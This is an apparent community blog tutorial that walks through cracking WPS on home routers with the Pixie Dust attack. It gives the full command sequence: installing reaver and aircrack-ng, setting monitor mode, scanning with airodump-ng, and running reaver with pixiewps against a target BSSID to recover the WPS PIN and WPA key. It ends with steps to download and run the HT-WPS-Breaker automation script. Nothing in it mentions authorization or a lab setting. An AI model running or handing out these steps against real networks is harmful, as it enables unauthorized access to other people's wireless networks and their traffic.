January 21, 2020

Hacking WPS via Pixie Dust Attack

Joshua H.
Share

Pixie Dust - Cybrary

This Cybrary 0P3N submission will cover how to use tools such as aircrack suite, Reaver, Pixiewps, & HT-WPS#B to exploit a WPS vulnerability in certain routers.This attack is carried out on a Machine running Kali Linux. (Kali comes pre-packaged with the mentioned tools aside from HT-WPS#B).Here is a list of vulnerable routers:Spreadsheet of Routers Vulnerable to WPS ExploitTo start, open a terminal as root and run the following commands. apt-get updateapt-get install reaver aircrack-ng Once you have ran the following commands, we will use airmon-ng to set our wireless card into monitor mode. (Must have a wireless card capable of packet injection)First we will check for any interfering processes by using the following command. airmon-ng check If processes were found, use the following command to kill them. airmon-ng check kill Now to set the card to monitor mode. airmon-ng start wlan0 Next we will use airodump-ng to scan for wireless access points with WPS enabled. airodump-ng wlan0mon --wps Once airodump has found the AP you are attacking, press ctrl+C to stop, then copy down the BSSID & Channel#.Our next step is to use Reaver combined with Pixiewps mode to exploit the target AP. reaver -i wlan0mon -c# -b XX:XX:XX:XX:XX:XX -k 1 -i specifies the interface used-c specifies the channel of the AP. Replace# with the channel number.-b specifies the BSSID of the AP. Replace XX:XX:XX:XX:XX:XX with the BSSID you copied down.You can also time the reaver process by using the following command. time reaver -i wlan0mon -c# -b XX:XX:XX:XX:XX:XX -k 1 If successful, the WPS pin will be passed to reaver and the WPA key will be discovered. Once you have followed the above steps and are comfortable with the process, I suggest using HT-WPS#B to automate the entire process.

Using HT-WPS-Breaker to automate the process. To install, CLICK HERE then drag the .zip to your desktop and run the following commands.

  • cd Desktop
  • unzip HT-WPS-Breaker-master.zip
  • cd HT-WPS-Breaker-master
  • chmod +x HT-WB.sh
  • ./HT-WB.sh or bash HT-WB.sh

This concludes a simple write up of how to use Reaver and other tools to attack a WPS enabled AP.I have had many questions on how to use Reaver so I hope this helps.Comment below if you have any questions. (Please keep comments in regards to the topic).~Evox

Start learning with Cybrary

Create a free account

Related Posts

All Blogs
Building a Security Team
June 27, 2023

Digital Forensics and Incident Response: What It Is, When You Need It, and How to Implement It

A quick guide to digital forensics and incident response (DFIR): what it is, when it’s needed, how to implement a cutting-edge program, and how to develop DFIR skills on your team.

Read More
Building a Security Team
June 28, 2023

How to Build a Red Team

An overview of what a red team is (and isn’t), and practical tips on how to build a Red Team and develop offensive security skills in your team.

Read More
Tools & Applications
June 7, 2023

How to Make the Most of Blending Learning with Cybrary Live

Learn how to get the most from your cybersecurity training platform by blending on-demand learning with virtual, live courses led by industry experts.

Read More
News & Events
June 7, 2023

Introducing the New Cybrary Learner Experience

Cybrary is launching a key update to the Cybrary Learner experience to elevate hands-on learning and measurement as guiding tenets of Cybrary’s mission.

Read More